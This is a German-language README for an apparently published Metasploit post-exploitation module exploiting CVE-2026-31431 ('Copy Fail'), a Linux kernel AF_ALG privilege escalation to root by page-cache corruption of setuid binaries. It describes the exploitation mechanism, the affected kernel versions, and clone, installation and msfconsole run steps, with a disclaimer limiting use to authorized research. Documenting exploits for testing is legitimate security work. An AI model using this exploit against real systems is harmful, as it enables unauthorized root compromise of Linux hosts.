Automatisiertes Metasploit-Post-Exploitation-Modul für CVE-2026-31431 ("Copy Fail"). Nutzt einen deterministischen Logikfehler im AF_ALG-Subsystem des Linux-Kernels aus, um eine lokale Privilegieneskalation (LPE) auf Root zu erreichen, indem eine setuid-Binärdatei sicher direkt im gemeinsamen Page Cache (RAM) korrumpiert wird, ohne Dateien auf der Festplatte zu verändern.
Ein automatisiertes Metasploit-Post-Exploitation-Modul, das CVE-2026-31431 (allgemein bekannt als "Copy Fail") ausnutzt, um eine lokale Privilegienausweitung (LPE) auf anfälligen Linux-Kerneln (Versionen 4.14 bis 6.19.12) durchzuführen.
Das Modul nutzt einen Logikfehler im kryptografischen Subsystem des Linux-Kernels (algif_aead-Modul der AF_ALG-Schnittstelle) aus. Aufgrund einer fehlerhaften In-Place-Speicheroptimierung kann ein unprivilegierter lokaler Benutzer den Systemaufruf splice() verwenden, um eine schreibgeschützte System-Binärdatei (wie /usr/bin/su oder /usr/bin/sudo) in einen -Socket abzubilden und einen kontrollierten 4-Byte-Überschreibvorgang direkt im System-Page-Cache (RAM) durchzuführen.
AF_ALGDurch die Korruption bestimmter privilegienprüfender Anweisungen einer setuid-Binärdatei im Arbeitsspeicher umgeht das Modul die Zugriffskontrollen und startet eine Root-Shell, ohne die physische Datei auf der Festplatte zu verändern.
shell- als auch meterpreter-Sitzungenregister_file_for_cleanup4.14 bis 6.19.12git clone https://github.com/adityasingh108/CVE-2026-31431-Metasploit-exploit
cd CVE-2026-31431-Metasploit-exploit
Metasploit-Benutzermodule sollten im lokalen Benutzermodulpfad abgelegt werden:
~/.msf4/modules/
Erstellen Sie die erforderliche Verzeichnisstruktur, falls sie noch nicht existiert:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
Kopieren Sie die Datei copy_fail.rb in das folgende Verzeichnis:
~/.msf4/modules/post/linux/escalation/
Endgültige Struktur:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
└── copy_fail.rb
Starten Sie die Metasploit-Konsole:
msfconsole
Laden Sie alle Module neu:
reload_all
Laden Sie das Exploit-Modul:
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
oder
exploit
msfconsole
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
Das Modul zielt auf anfällige Linux-Kernel ab:
4.14 <= Kernel Version <= 6.19.12
Dieses Projekt dient ausschließlich Bildungszwecken und autorisierter Sicherheitsforschung. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, kann gegen geltende Gesetze und Vorschriften verstoßen. Nutzen Sie es verantwortungsbewusst.